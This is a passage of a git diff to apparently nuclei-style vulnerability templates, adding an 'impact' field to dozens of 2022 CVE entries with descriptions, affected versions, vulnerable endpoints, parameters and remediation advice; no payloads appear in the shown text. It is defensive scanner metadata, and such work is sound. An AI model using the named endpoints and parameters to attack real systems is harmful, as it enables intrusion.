/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Upgrade GLPI to a version higher than 10.0.2 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36446.yaml b/http/cves/2022/CVE-2022-36446.yaml index a7f33dfe14..96433b9af8 100644 --- a/http/cves/2022/CVE-2022-36446.yaml +++ b/http/cves/2022/CVE-2022-36446.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system. remediation: | Upgrade Webmin to version 1.997 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36537.yaml b/http/cves/2022/CVE-2022-36537.yaml index 665248998f..607ab07bae 100644 --- a/http/cves/2022/CVE-2022-36537.yaml +++ b/http/cves/2022/CVE-2022-36537.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ZK Framework 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2 and 8.6.4.1 is susceptible to information disclosure. An attacker can access sensitive information via a crafted POST request to the component AuUploader and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as credentials or internal system information. remediation: | Apply the latest security patches or updates provided by the ZK Framework to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36642.yaml b/http/cves/2022/CVE-2022-36642.yaml index a91bab8cdd..c9f0ec188f 100644 --- a/http/cves/2022/CVE-2022-36642.yaml +++ b/http/cves/2022/CVE-2022-36642.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Telos Alliance Omnia MPX Node through 1.5.0+r1 is vulnerable to local file inclusion via logs/downloadMainLog. By retrieving userDB.json allows an attacker to retrieve cleartext credentials and escalate privileges via the control panel. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Omnia MPX. reference: diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml index ee277ea98c..4ad733a478 100644 --- a/http/cves/2022/CVE-2022-36804.yaml +++ b/http/cves/2022/CVE-2022-36804.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches provided by Atlassian to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml index 4e0349e132..b8e76f1d78 100644 --- a/http/cves/2022/CVE-2022-36883.yaml +++ b/http/cves/2022/CVE-2022-36883.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin. remediation: | Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml index 22642b90fc..5cc91a2358 100644 --- a/http/cves/2022/CVE-2022-37190.yaml +++ b/http/cves/2022/CVE-2022-37190.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml index 21bb7f0720..1fdfc8fb30 100644 --- a/http/cves/2022/CVE-2022-37191.yaml +++ b/http/cves/2022/CVE-2022-37191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution. remediation: | Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0. reference: diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml index e49f389f39..496dce9711 100644 --- a/http/cves/2022/CVE-2022-37299.yaml +++ b/http/cves/2022/CVE-2022-37299.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml index 34e1ef91de..5f97231b6a 100644 --- a/http/cves/2022/CVE-2022-3768.yaml +++ b/http/cves/2022/CVE-2022-3768.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml index 3c2bbcc7a2..42391aa1d6 100644 --- a/http/cves/2022/CVE-2022-3800.yaml +++ b/http/cves/2022/CVE-2022-3800.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml index 1898e9c35e..0756ad6957 100644 --- a/http/cves/2022/CVE-2022-38295.yaml +++ b/http/cves/2022/CVE-2022-38295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml index 58bac98117..832437cd0b 100644 --- a/http/cves/2022/CVE-2022-38296.yaml +++ b/http/cves/2022/CVE-2022-38296.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml index 7276d2328d..a335c2683c 100644 --- a/http/cves/2022/CVE-2022-38463.yaml +++ b/http/cves/2022/CVE-2022-38463.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance. remediation: | Apply the latest security patches provided by ServiceNow to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml index 4b1dfe2c0a..6d7aef8b1a 100644 --- a/http/cves/2022/CVE-2022-38467.yaml +++ b/http/cves/2022/CVE-2022-38467.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.1.1 reference: - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53 diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index 6b3c874da9..d5be904f4c 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index f4f6a2e7e4..dce2d2e8f1 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml index b94e02c18e..ab8e6d0bb0 100644 --- a/http/cves/2022/CVE-2022-38794.yaml +++ b/http/cves/2022/CVE-2022-38794.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zaver through 2020-12-15 is vulnerable to local file inclusion via the GET /.. substring. + impact: | + This vulnerability can lead to unauthorized access, data leakage, and remote code execution. remediation: | To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations. reference: diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 486b7959b7..ebe9eada08 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure. remediation: | Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index 4eec3c0609..9034b5d9d8 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive information. remediation: | Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml index 085cd55ce7..4613f8d9bb 100644 --- a/http/cves/2022/CVE-2022-3908.yaml +++ b/http/cves/2022/CVE-2022-3908.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser. remediation: Fixed in version 1.4.7. reference: - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505 diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 4a3d0ba77c..5e93491295 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 4bbd474257..1ef06a8d15 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks. + impact: | + An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks. remediation: Fixed in version 3.9.6. reference: - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4 diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml index 754e34be11..c285711e84 100644 --- a/http/cves/2022/CVE-2022-3934.yaml +++ b/http/cves/2022/CVE-2022-3934.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.0.13. reference: - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 4dc0caad57..1c0f3d9047 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks. remediation: | Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index cce8226756..1c95f6abd7 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website. remediation: Fixed in 3.2.2. reference: - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867 diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index f6c8a14ba9..487c81715a 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data loss. remediation: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above. reference: - https://fortiguard.com/psirt/FG-IR-22-300 diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 409c36d598..6e8c0c5f44 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive data. remediation: | Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue. reference: diff --git a/http/cves/2022/CVE-2022-39986.yaml b/http/cves/2022/CVE-2022-39986.yaml index 3ebe24f624..bcf57356d0 100644 --- a/http/cves/2022/CVE-2022-39986.yaml +++ b/http/cves/2022/CVE-2022-39986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml index c9c099289f..809a676103 100644 --- a/http/cves/2022/CVE-2022-40022.yaml +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device. remediation: | Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40083.yaml b/http/cves/2022/CVE-2022-40083.yaml index d945b3963f..69adb76b99 100644 --- a/http/cves/2022/CVE-2022-40083.yaml +++ b/http/cves/2022/CVE-2022-40083.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Labstack Echo 4.8.0 contains an open redirect vulnerability via the Static Handler component. An attacker can leverage this vulnerability to cause server-side request forgery, making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: Download and install 4.9.0, which contains a patch for this issue. reference: - https://github.com/labstack/echo/issues/2259 diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 97f498bfd1..31c9b6ee47 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -6,6 +6,8 @@ info: severity: high description: | A vulnerability in Example Dags of Apache Airflow allows an attacker with UI access who can trigger DAGs, to execute arbitrary commands via manually provided run_id parameter. This issue affects Apache Airflow Apache Airflow versions prior to 2.4.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade AirFlow to version 2.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40359.yaml b/http/cves/2022/CVE-2022-40359.yaml index 58830e72af..0435d5d900 100644 --- a/http/cves/2022/CVE-2022-40359.yaml +++ b/http/cves/2022/CVE-2022-40359.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kae's File Manager through 1.4.7 contains a cross-site scripting vulnerability via a crafted GET request to /kfm/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Kae's File Manager plugin (1.4.7) or apply the vendor-provided patch to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4050.yaml b/http/cves/2022/CVE-2022-4050.yaml index 1b4353d0bf..a0506c8e99 100644 --- a/http/cves/2022/CVE-2022-4050.yaml +++ b/http/cves/2022/CVE-2022-4050.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress JoomSport plugin before 5.2.8 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Update to JoomSport plugin version 5.2.8 or later. reference: diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 9feb4a4144..8ea045676f 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. + impact: | + An attacker can gain access to sensitive information, potentially leading to further attacks. remediation: | Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4060.yaml b/http/cves/2022/CVE-2022-4060.yaml index 67fc26c094..921a51f363 100644 --- a/http/cves/2022/CVE-2022-4060.yaml +++ b/http/cves/2022/CVE-2022-4060.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site. remediation: | Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4063.yaml b/http/cves/2022/CVE-2022-4063.yaml index 340dc73865..619da4bb78 100644 --- a/http/cves/2022/CVE-2022-4063.yaml +++ b/http/cves/2022/CVE-2022-4063.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. + impact: | + The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 diff --git a/http/cves/2022/CVE-2022-40684.yaml b/http/cves/2022/CVE-2022-40684.yaml index 846fbd622c..a6a2d2d22d 100644 --- a/http/cves/2022/CVE-2022-40684.yaml +++ b/http/cves/2022/CVE-2022-40684.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device. remediation: | Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index d8e3438636..47417c6c6d 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution. remediation: | Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor. reference: diff --git a/http/cves/2022/CVE-2022-40843.yaml b/http/cves/2022/CVE-2022-40843.yaml index 8fc98c285f..01409c925a 100644 --- a/http/cves/2022/CVE-2022-40843.yaml +++ b/http/cves/2022/CVE-2022-40843.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Tenda AC1200 V-W15Ev2 router is affected by improper authorization/improper session management. The software does not perform or incorrectly perform an authorization check when a user attempts to access a resource or perform an action. This allows the router's login page to be bypassed. The improper validation of user sessions/authorization can lead to unauthenticated attackers having the ability to read the router's file, which contains the MD5 password of the Administrator's user account. This vulnerability exists within the local web and hosted remote management console. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential access to sensitive information. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 39b66b0432..34020e6b2d 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.1.0 contains multiple cross-site scripting vulnerabilities via the errorMsg parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of kkFileView or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index c7a0696a35..014bcb46a4 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 is vulnerable to a command injection via network_test.php. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarView. reference: diff --git a/http/cves/2022/CVE-2022-4117.yaml b/http/cves/2022/CVE-2022-4117.yaml index 2d4056fe62..425f9d6917 100644 --- a/http/cves/2022/CVE-2022-4117.yaml +++ b/http/cves/2022/CVE-2022-4117.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the affected WordPress site. remediation: | Update to the latest version of the WordPress IWS Geo Form Fields plugin (>=1.1) or apply the vendor-supplied patch to mitigate the SQL Injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-4140.yaml b/http/cves/2022/CVE-2022-4140.yaml index b103b553c6..f0a90f9cd7 100644 --- a/http/cves/2022/CVE-2022-4140.yaml +++ b/http/cves/2022/CVE-2022-4140.yaml @@ -6,6 +6,8 @@ 